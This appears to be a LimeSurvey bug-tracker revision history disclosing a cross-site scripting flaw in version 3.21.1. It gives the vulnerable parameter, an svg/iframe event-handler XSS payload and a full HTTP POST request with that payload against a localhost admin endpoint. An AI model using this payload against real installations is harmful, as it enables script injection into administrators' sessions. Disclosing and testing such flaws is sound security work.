View Revisions: Issue #15672

Summary 15672: LimeSurvey 3.21.1 Cross Site Scripting
Revision 2020-05-04 09:43 by ollehar
Additional Information
Vulnerable parameter: ParticipantAttributeNamesDropdown[]
Attack vector: test<input><svg+"/onmouseover="confirm('AttDropdown');//"onload=onload>so5cx\\\"onmouseover=alert('AttDropdown');//><iframe/onmouseover=alert('AttDropdown')></iframe>//


HTTP POST Request:

POST /limesurvey3.21.1/index.php/admin/participants/sa/editAttributeName HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 739
Origin: http://localhost
Connection: close
Referer: http://localhost/limesurvey3.21.1/index.php/admin/participants/sa/attributeControl
Cookie: LS-WIGSLJDTCJQVXTND=obtbddm0i3ddpiroojm04s8smu; LS-TRVXSHABVTHDTKHE=u56nldt5edh2rb1ljo71f3dh0o; PHPSESSID=gptp9k9bi8jcscu1ttid3pbvq8; LS-OOSUJAAJFRZHZYBG=hh6vpf8f8oomcnaqc03h2qcpdm; YII_CSRF_TOKEN=eGthZG9JTGZ1d2RHcHk3bGUyT1R5X1pCOHd5Nkp5eFMG8lWciXbJNQCd-EOnoJN1jIMWEo3pj4aYbFBa-FAXIA%3D%3D

YII_CSRF_TOKEN=eGthZG9JTGZ1d2RHcHk3bGUyT1R5X1pCOHd5Nkp5eFMG8lWciXbJNQCd-EOnoJN1jIMWEo3pj4aYbFBa-FAXIA%3D%3D&oper=edit&ParticipantAttributeName%5Battribute_id%5D=1&ParticipantAttributeName%5Bdefaultname%5D=test&ParticipantAttributeName%5Battribute_type%5D=DD&ParticipantAttributeName%5Bvisible%5D=TRUE&ParticipantAttributeNamesDropdown%5B%5D=%3Cinput%3E%3Csvg%2B%22%2Fonmouseover%3D%22confirm('AttDropdown')%3B%2F%2F%22onload%3Donload%3Eso5cx%5C%5C%5C%22onmouseover%3Dalert('AttDropdown')%3B%2F%2F%3E%3Ciframe%2Fonmouseover%3Dalert('AttDropdown')%3E%3C%2Fiframe%3E%2F%2F&ParticipantAttributeName_addLanguage_language=&ParticipantAttributeNameLanguages%5Ben%5D=&dummyParticipantAttributeNameLanguages=&dummyParticipantAttributeNamesDropdown=
Revision 2019-12-17 21:41 by misheljava
Additional Information
(Same content as the 2020-05-04 09:43 revision above: vulnerable parameter, attack vector and HTTP POST request are unchanged.)